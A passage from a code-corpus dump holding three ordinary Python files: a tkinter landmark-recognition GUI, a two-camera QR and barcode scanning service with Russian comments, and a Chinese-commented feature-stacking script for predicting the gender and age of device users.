maaf, lokasi tidak diketahui atau belum masuk pustaka sistem'\r\n\telse:\r\n\t\thasil='Benteng Vredeberg'\r\n\t\thaha=\"Benteng Vredeburg Yogyakarta terkait erat dengan lahirnya Kasultanan Yogyakarta. \\nPerjanjian Giyanti 13 Februari 1755 yang berrhasil menyelesaikan perseteruan \\nantara Susuhunan Pakubuwono III dengan Pangeran Mangkubumi (Sultan Hamengku Buwono I kelak)\\nadalah merupakan hasil politik Belanda yang selalu ingin \\nikut campur urusan dalam negeri raja-raja Jawa waktu itu.(sumber: Wikipedia)\"\r\n\t\r\n\treturn hasil, haha, prob\r\n\r\ndef openweb():\r\n\tchromedir= 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\r\n\tlink=maps.get(lis[0])\r\n\twebbrowser.get(chromedir).open(link)\r\n\r\ndef peking():\r\n\thasil, haha, prob=doNothing()\r\n\tlabe.configure(text=hasil) \r\n\thah.configure(text=haha)\r\n\tif prob<=0.60:\r\n\t\tprob=str(int(prob*100))+'%'\r\n\t\theh.configure(text=prob, foreground='red')\r\n\telse:\r\n\t\tprob=str(int(prob*100))+'%'\r\n\t\theh.configure(text=prob)\r\n\tconf.configure(text=\"Nilai Probabilitas: \")\r\n\r\ndef browse_file():\r\n\tglobal source\r\n\tsource = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\")\r\n\ttarget_dir = os.getcwd()\r\n\tcopy2(source, target_dir+'/'+'pict.jpg' )\r\n\tim=PhotoImage('pict.jpg')\r\n\tshowImg()\r\n\tlabe.configure(text=\" \")\t\r\n\thah.configure(text=\" \")\r\n\theh.configure(text=\" \")\r\n\tconf.configure(text=\" \")\r\n\r\ndef showImg():\r\n load = Image.open(\"pict.jpg\")\r\n x=int(load.width//300)\r\n y=int(load.height//x)\r\n image2 = load.resize((300,y), Image.ANTIALIAS)\r\n render = ImageTk.PhotoImage(image2)\r\n global img\r\n img.configure(image=render)\r\n img.image = render\r\n root.geometry(\"1050x500\")\t\r\n\r\n#***Toolbar\r\ntoolbar=Frame(root,bg='#fcba03')\r\nmedium=Frame(root)\r\n\r\ninsertButt=ttk.Button(toolbar,text='Insert Image', command=browse_file)\r\ninsertButt.pack(side=LEFT,padx=2, pady=2)\r\nsubmitButt=ttk.Button(toolbar,text='Submit', command=peking)\r\nsubmitButt.pack(side=LEFT,padx=2, pady=2)\r\nfindButt=ttk.Button(toolbar,text='Find Location', command=openweb)\r\nfindButt.pack(side=LEFT,padx=2, pady=2)\r\n\r\nlabe=ttk.Label(medium,font='Helvetica 18 bold', anchor=\"e\")\r\nlabe.grid(row = 0, column = 0, sticky = W, pady = 2)\r\nhah=ttk.Label(medium, anchor=\"e\")\r\nhah.grid(row = 1, column = 0, sticky = W, pady = 2)\r\nconf=ttk.Label(medium, anchor='e')\r\nconf.grid (row = 2, column = 0, sticky = W, pady = 2)\r\nheh=ttk.Label(medium, font='Helvetica 12 bold', anchor=\"e\")\r\nheh.grid(row = 3, column = 0, sticky = W, pady = 2)\r\n\r\nimg= ttk.Label(root)\r\nimg.place(y=120, x=80, width=300)\r\n\r\ntoolbar.grid(row = 0, sticky = W, pady = 2) \r\nmedium.grid(row = 1, column = 1, sticky = W, pady = 85, padx=200) \r\n\r\n#medium.pack(fill=X)\r\nroot.mainloop()\r\n", "sub_path": "unk_rapih.py", "file_name": "unk_rapih.py", "file_ext": "py", "file_size_in_byte": 7658, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.xfeatures2d.SIFT_create", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.xfeatures2d", "line_number": 73, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 110, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 126, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 126, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 127, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 137, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 140, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 141, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 141, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 151, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 153, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 153, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 155, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 158, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 160, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 160, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 162, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 162, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 164, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 164, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 167, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 167, "usage_type": "name"}]}
+{"seq_id": "202242020", "text": "\"\"\"\nГлавный файл программы.\n\nЗдесь происходит запуск и управление процессами, которые читают коды с камер,\nполучение от них данных, их синхронизация между собой и отправка запросов с финальными данными.\n\n-----\n\nНемного о задаче:\n - 2 камеры смотрят на продукцию с двух сторон\n - на продукции с одной из сторон есть QR-коды и штрих-коды и видит их только 1 камера из 2-ух\n - если с продукции прочитано кодов меньше ожидаемого числа, то нужно известить об ошибке\n - если на продукции есть коды и их нужное кол-во, то их нужно отправить серверу\n - изредка функции которые определяют, есть ли продукция на изображении, ошибаются -\n приходят данные с продукцией без кодов\n - ...\n - возможно ещё что-то, но я не помню\n\"\"\"\nimport os\nfrom multiprocessing import Queue, Process\nfrom queue import Empty\n\nfrom loguru import logger\n\nfrom .communication.signals import get_pack_codes_count, notify_bad_packdata, notify_about_packdata\nfrom .event_system.events import *\nfrom .event_system.handling import EventProcessor\nfrom .packs_processing import Interval2CamerasProcessingQueue\nfrom .video_processing import get_events_from_video\n\n\nclass CameraScannerProcess(Process):\n \"\"\"\n Процесс - обработчик событий с камеры.\n Общается с управляющим процессом через ``queue``.\n \"\"\"\n\n def __init__(self, *args):\n super().__init__(\n target=self.task,\n args=tuple(args),\n daemon=True\n )\n\n @staticmethod\n def task(\n queue: Queue,\n worker_id: int,\n video_url: str,\n display_window: bool,\n auto_reconnect: bool,\n recognizer_args: tuple,\n ) -> None:\n \"\"\"\n Метод для запуска в отдельном процессе.\n\n Бесконечное читает QR-, штрихкоды с выбранной камеры\n и отправляет их данные базовому процессу через ``queue``.\n\n Кладёт в ``queue`` следующие события-наследники от ``CamScannerEvent``:\n\n - В случае ошибок экземпляр ``TaskError`` с информацией об ошибке.\n - В случае успешной обработки экземпляр ``CameraPackResult`` со считанными данными.\n \"\"\"\n try:\n events = get_events_from_video(\n video_url=video_url,\n display_window=display_window,\n auto_reconnect=auto_reconnect,\n recognizer_args=recognizer_args,\n )\n\n # бесконечный цикл, который получает события от камеры и кладёт их в очередь\n for event in events:\n event.worker_id = worker_id\n event.receive_time = None\n\n # отправка события основному процессу\n queue.put(event)\n except KeyboardInterrupt:\n pass\n\n\nclass RunnerWith2Cameras:\n _queue: Queue\n _processes: list[Process]\n\n def __init__(self, processes_args: list[tuple], domain_url: str):\n self._queue = Queue()\n self._sync_queue = Interval2CamerasProcessingQueue()\n self._event_processor = EventProcessor()\n self._processes = self._get_processes(processes_args)\n self._domain_url = domain_url\n self._expected_codes_count = 2\n self._iter_modcounter = 0\n\n self._init_event_processor()\n\n def _get_processes(self, processes_args) -> list[Process]:\n \"\"\"Инициализирует и возвращает процессы\"\"\"\n processes = [CameraScannerProcess(self._queue, worker_id, *args)\n for worker_id, args in enumerate(processes_args)]\n return processes\n\n def _run_processes(self) -> None:\n \"\"\"Запускает процессы\"\"\"\n for process in self._processes:\n process.start()\n\n def _kill_processes(self) -> None:\n \"\"\"Убивает процессы\"\"\"\n for process in self._processes:\n if not process.is_alive():\n continue\n process.terminate()\n process.join()\n\n def _init_event_processor(self):\n handlers = [\n self._process_camerapackresult,\n self._process_taskerror,\n self._process_startscanning,\n self._process_endscanning,\n self._process_packwithcodes,\n self._process_packbadcodes,\n ]\n for handler in handlers:\n self._event_processor.add_handler(handler)\n\n def _update_expected_codes_count(self) -> None:\n ITERATION_PER_REQUEST = 15\n if self._iter_modcounter != 0:\n return\n new_codes_count = get_pack_codes_count(self._domain_url)\n if new_codes_count is not None:\n self.expected_codes_count = new_codes_count\n self._iter_modcounter = (self._iter_modcounter + 1) % ITERATION_PER_REQUEST\n\n def _get_event_from_cam(self) -> Optional[CamScannerEvent]:\n QUEUE_REQUEST_TIMEOUT_SEC = 1.5\n try:\n event = self._queue.get(timeout=QUEUE_REQUEST_TIMEOUT_SEC)\n return event\n except Empty:\n return None\n\n def mainloop_with_lock(self) -> None:\n \"\"\"\n Запускает процессы обработки QR- и штрихкодов с камер,\n открывает блокирующий событийный цикл для обработки приходящих от них событий.\n\n Отлавливает и логгирует доходящие до него некритичные исключения.\n\n Завершается при ``KeyboardInterrupt`` (Ctrl+C в терминале)\n \"\"\"\n self._run_processes()\n\n while True:\n try:\n self._update_expected_codes_count()\n events = list(self._sync_queue.get_processed_latest())\n\n event = self._get_event_from_cam()\n if event is not None:\n events.append(event)\n\n for event in events:\n # тут происходит обработка событий из списка с событиями\n # - вызывается подходящий метод self._process_*Событие*\n self._event_processor.process_event(event)\n\n except KeyboardInterrupt as e:\n logger.info(f\"Выполнение прервано {e}\")\n self._kill_processes()\n break\n except Exception as e:\n logger.exception(\"Неотловленное исключение\")\n logger.opt(exception=e)\n\n def _process_camerapackresult(self, event: CameraPackResult):\n msg = (f\"Получены данные от процесса #{event.worker_id}: \"\n f\"QR={event.qr_codes} \"\n f\"BAR={event.barcodes} \"\n f\"время пачки='{event.start_time} - {event.finish_time}'\")\n logger.debug(msg)\n event.receive_time = datetime.now()\n event.is_paired = False\n event.expected_codes_count = self._expected_codes_count\n self._sync_queue.enqueue(event)\n\n @staticmethod\n def _process_taskerror(event: TaskError):\n event.receive_time = datetime.now()\n logger.error(f\"В процессе #{event.worker_id} \"\n f\"произошла ошибка: {event.message}\")\n\n @staticmethod\n def _process_startscanning(event: StartScanning):\n event.receive_time = datetime.now()\n logger.info(f\"Процесс #{event.worker_id} начал сканирование\")\n\n def _process_endscanning(self, event: EndScanning):\n event.receive_time = datetime.now()\n logger.info(f\"Процесс #{event.worker_id} завершил работу\")\n\n process = self._processes[event.worker_id]\n process.terminate()\n process.join()\n\n alive_count = sum(process.is_alive() for process in self._processes)\n if alive_count == 0:\n raise KeyboardInterrupt(\"Все процессы завершили работу. Закрытие программы\")\n\n # noinspection PyUnusedLocal\n def _process_packbadcodes(self, event: PackBadCodes):\n notify_bad_packdata(self._domain_url)\n\n def _process_packwithcodes(self, event: PackWithCodes):\n notify_about_packdata(\n self._domain_url,\n barcodes=event.barcodes,\n qr_codes=event.qr_codes,\n )\n\n\ndef setup_logger():\n log_path = os.getenv('LOG_PATH', 'logs/2cameras.log')\n log_level = os.getenv('LOG_LEVEL', 'DEBUG')\n\n logger.add(sink=log_path, level=log_level, rotation='2 MB', compression='zip')\n\n\ndef collect_scanners_args() -> list[tuple]:\n video_urls = os.getenv('VIDEO_URLS', 'video1.mp4;video2.mp4')\n display_window = os.getenv('DISPLAY_WINDOW', '1')\n auto_reconnect = os.getenv('AUTO_RECONNECT', '1')\n\n video_urls = video_urls.split(';')\n display_window = int(display_window) != 0\n auto_reconnect = int(auto_reconnect) != 0\n\n if len(video_urls) != 2:\n message = (\"Данная программа рассчитана на 2 камеры. \"\n \"В .env через ';' ожидается ровно 2 адреса для подключения.\")\n raise ValueError(message)\n\n return [\n (\n video_url,\n display_window,\n auto_reconnect,\n tuple(),\n ) for video_url in video_urls\n ]\n\n\ndef run():\n \"\"\"\n Готовит список аргументов, логер и запускает выполнение\n событийного цикла по обработке событий процессов-сканеров.\n \"\"\"\n domain_url = os.getenv('DOMAIN_URL', 'http://localhost')\n setup_logger()\n\n # аргументы для worker_task (кроме queue и worker_id) для запуска в разных процессах\n processes_args = collect_scanners_args()\n\n try:\n runner = RunnerWith2Cameras(processes_args, domain_url)\n runner.mainloop_with_lock()\n except BaseException as e:\n logger.critical(\"Падение с критической ошибкой\")\n logger.opt(exception=e)\n raise e\n", "sub_path": "BarcodeQR_CamScanner/scan_with_2_cameras.py", "file_name": "scan_with_2_cameras.py", "file_ext": "py", "file_size_in_byte": 11149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "multiprocessing.Process", "line_number": 32, "usage_type": "name"}, {"api_name": "multiprocessing.Queue", "line_number": 47, "usage_type": "name"}, {"api_name": "video_processing.get_events_from_video", "line_number": 66, "usage_type": "call"}, {"api_name": "queue.put", "line_number": 79, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 85, "usage_type": "name"}, {"api_name": "multiprocessing.Process", "line_number": 86, "usage_type": "name"}, {"api_name": "multiprocessing.Queue", "line_number": 89, "usage_type": "call"}, {"api_name": "packs_processing.Interval2CamerasProcessingQueue", "line_number": 90, "usage_type": "call"}, {"api_name": "event_system.handling.EventProcessor", "line_number": 91, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 99, "usage_type": "name"}, {"api_name": "communication.signals.get_pack_codes_count", "line_number": 134, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 144, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 173, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 173, "usage_type": "name"}, {"api_name": "loguru.logger.exception", "line_number": 177, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 177, "usage_type": "name"}, {"api_name": "loguru.logger.opt", "line_number": 178, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 178, "usage_type": "name"}, {"api_name": "loguru.logger.debug", "line_number": 185, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 185, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 194, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 194, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 200, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 200, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 204, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 204, "usage_type": "name"}, {"api_name": "communication.signals.notify_bad_packdata", "line_number": 216, "usage_type": "call"}, {"api_name": "communication.signals.notify_about_packdata", "line_number": 219, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 227, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 228, "usage_type": "call"}, {"api_name": "loguru.logger.add", "line_number": 230, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 230, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 234, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 235, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 236, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 262, "usage_type": "call"}, {"api_name": "loguru.logger.critical", "line_number": 272, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 272, "usage_type": "name"}, {"api_name": "loguru.logger.opt", "line_number": 273, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 273, "usage_type": "name"}]}
+{"seq_id": "214494213", "text": "# -*- coding:utf-8 -*-\n\nimport pandas as pd\nimport scipy.sparse\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ntrain = pd.read_csv('Demo/deviceid_train.tsv', sep='\\t', header=None)\ntest = pd.read_csv('Demo/deviceid_test.tsv', sep='\\t', header=None)\n\ndata_all = pd.concat([train, test], axis=0)\ndata_all = data_all.rename({0:'id'}, axis=1)\ndel data_all[1],data_all[2]\n\nstart_close_time = pd.read_csv('Demo/deviceid_package_start_close.tsv', sep='\\t', header=None)\nstart_close_time = start_close_time.rename({0:'id', 1:'app_name', 2:'start_time', 3:'close_time'}, axis=1)\n\nstart_close_time = start_close_time.sort_values(by='start_time')\n\nstart_close_time['start_time'] = map(int,start_close_time['start_time']/1000)\nstart_close_time['close_time'] = map(int,start_close_time['close_time']/1000)\n\nunique_app_name = np.unique(start_close_time['app_name'])\ndict_label = dict(zip(list(unique_app_name), list(np.arange(0, len(unique_app_name), 1))))\nimport time\nstart_close_time['app_name'] = start_close_time['app_name'].apply(lambda row: str(dict_label[row]))\n\ndel start_close_time['start_time'], start_close_time['close_time']\n\nfrom tqdm import tqdm, tqdm_pandas\ntqdm_pandas(tqdm())\ndef dealed_row(row):\n app_name_list = list(row['app_name'])\n return ' '.join(app_name_list)\n\ndata_feature = start_close_time.groupby('id').progress_apply(lambda row:dealed_row(row)).reset_index()\ndata_feature = pd.merge(data_all, data_feature, on='id', how='left')\ndel data_feature['id']\n\ncount_vec = CountVectorizer(ngram_range=(1,3))\ncount_csr_basic = count_vec.fit_transform(data_feature[0])\ntfidf_vec = TfidfVectorizer(ngram_range=(1,3))\ntfidf_vec_basic = tfidf_vec.fit_transform(data_feature[0])\n\ndata_feature = scipy.sparse.csr_matrix(scipy.sparse.hstack([count_csr_basic, tfidf_vec_basic]))\n\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier, PassiveAggressiveClassifier, RidgeClassifier\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.svm import LinearSVC\nfrom sklearn.cross_validation import StratifiedKFold\n\ntrain = pd.read_csv('Demo/deviceid_train.tsv', sep='\\t', header=None)\ntest = pd.read_csv('Demo/deviceid_test.tsv', sep='\\t', header=None)\ndef get_label(row):\n if row[1] == 1:\n return row[2]\n else:\n return row[2] + 11\ntrain['label'] = train.apply(lambda row:get_label(row), axis=1)\ndata_all = pd.concat([train, test], axis=0)\ndata_all = data_all.rename({0:'id'}, axis=1)\ndel data_all[1],data_all[2]\n\ntrain_feature = data_feature[:len(train)]\nscore = train['label']\ntest_feature = data_feature[len(train):]\nnumber = len(np.unique(score))\n\n# 五则交叉验证\nn_folds = 5\nprint('处理完毕')\n\n########################### lr(LogisticRegression) ################################\nprint('lr stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n clf = LogisticRegression(random_state=1017, C=8)\n clf.fit(train_feature[tr], score[tr])\n score_va = clf.predict_proba(train_feature[va])\n score_te = clf.predict_proba(test_feature)\n print('得分' + str(mean_squared_error(score[va], clf.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_lr_2_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_lr_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('lr特征已保存\\n')\n\n########################### SGD(随机梯度下降) ################################\nprint('sgd stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n sgd = SGDClassifier(random_state=1017, loss='log')\n sgd.fit(train_feature[tr], score[tr])\n score_va = sgd.predict_proba(train_feature[va])\n score_te = sgd.predict_proba(test_feature)\n print('得分' + str(mean_squared_error(score[va], sgd.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_2_sgd_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_sgd_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('sgd特征已保存\\n')\n\n########################### pac(PassiveAggressiveClassifier) ################################\nprint('PAC stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n pac = PassiveAggressiveClassifier(random_state=1017)\n pac.fit(train_feature[tr], score[tr])\n score_va = pac._predict_proba_lr(train_feature[va])\n score_te = pac._predict_proba_lr(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], pac.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_pac_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_pac_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('pac特征已保存\\n')\n\n\n########################### ridge(RidgeClassfiy) ################################\nprint('RidgeClassfiy stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n ridge = RidgeClassifier(random_state=1017)\n ridge.fit(train_feature[tr], score[tr])\n score_va = ridge._predict_proba_lr(train_feature[va])\n score_te = ridge._predict_proba_lr(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], ridge.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_ridge_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_ridge_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('ridge特征已保存\\n')\n\n\n########################### bnb(BernoulliNB) ################################\nprint('BernoulliNB stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n bnb = BernoulliNB()\n bnb.fit(train_feature[tr], score[tr])\n score_va = bnb.predict_proba(train_feature[va])\n score_te = bnb.predict_proba(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], bnb.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_bnb_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_bnb_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('BernoulliNB特征已保存\\n')\n\n########################### mnb(MultinomialNB) ################################\nprint('MultinomialNB stacking')\nstack_train = np.zeros((len(train), number))\nstack_test = np.zeros((len(test), number))\nscore_va = 0\n\nfor i, (tr, va) in enumerate(StratifiedKFold(score, n_folds=n_folds, random_state=1017)):\n print('stack:%d/%d' % ((i + 1), n_folds))\n mnb = MultinomialNB()\n mnb.fit(train_feature[tr], score[tr])\n score_va = mnb.predict_proba(train_feature[va])\n score_te = mnb.predict_proba(test_feature)\n print(score_va)\n print('得分' + str(mean_squared_error(score[va], mnb.predict(train_feature[va]))))\n stack_train[va] += score_va\n stack_test += score_te\nstack_test /= n_folds\nstack = np.vstack([stack_train, stack_test])\ndf_stack = pd.DataFrame()\nfor i in range(stack.shape[1]):\n df_stack['tfidf_mnb_classfiy_{}'.format(i)] = np.around(stack[:, i], 6)\ndf_stack.to_csv('feature/tfidf_mnb_1_3_error_single_classfiy.csv', index=None, encoding='utf8')\nprint('MultinomialNB特征已保存\\n')\n", "sub_path": "性别年龄预测/top1/nb_cz_lwl_wcm/4_get_feature_device_start_close_tfidf_1_2.py", "file_name": "4_get_feature_device_start_close_tfidf_1_2.py", "file_ext": "py", "file_size_in_byte": 9008, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "tqdm.tqdm_pandas", "line_number": 32, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.csr_matrix", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 46, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 46, "usage_type": "name"}, {"api_name": "scipy.sparse.sparse.hstack", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 85, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 106, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.linear_model.PassiveAggressiveClassifier", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.linear_model.RidgeClassifier", "line_number": 156, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 165, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 176, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.StratifiedKFold", "line_number": 179, "usage_type": "call"}, {"api_name": 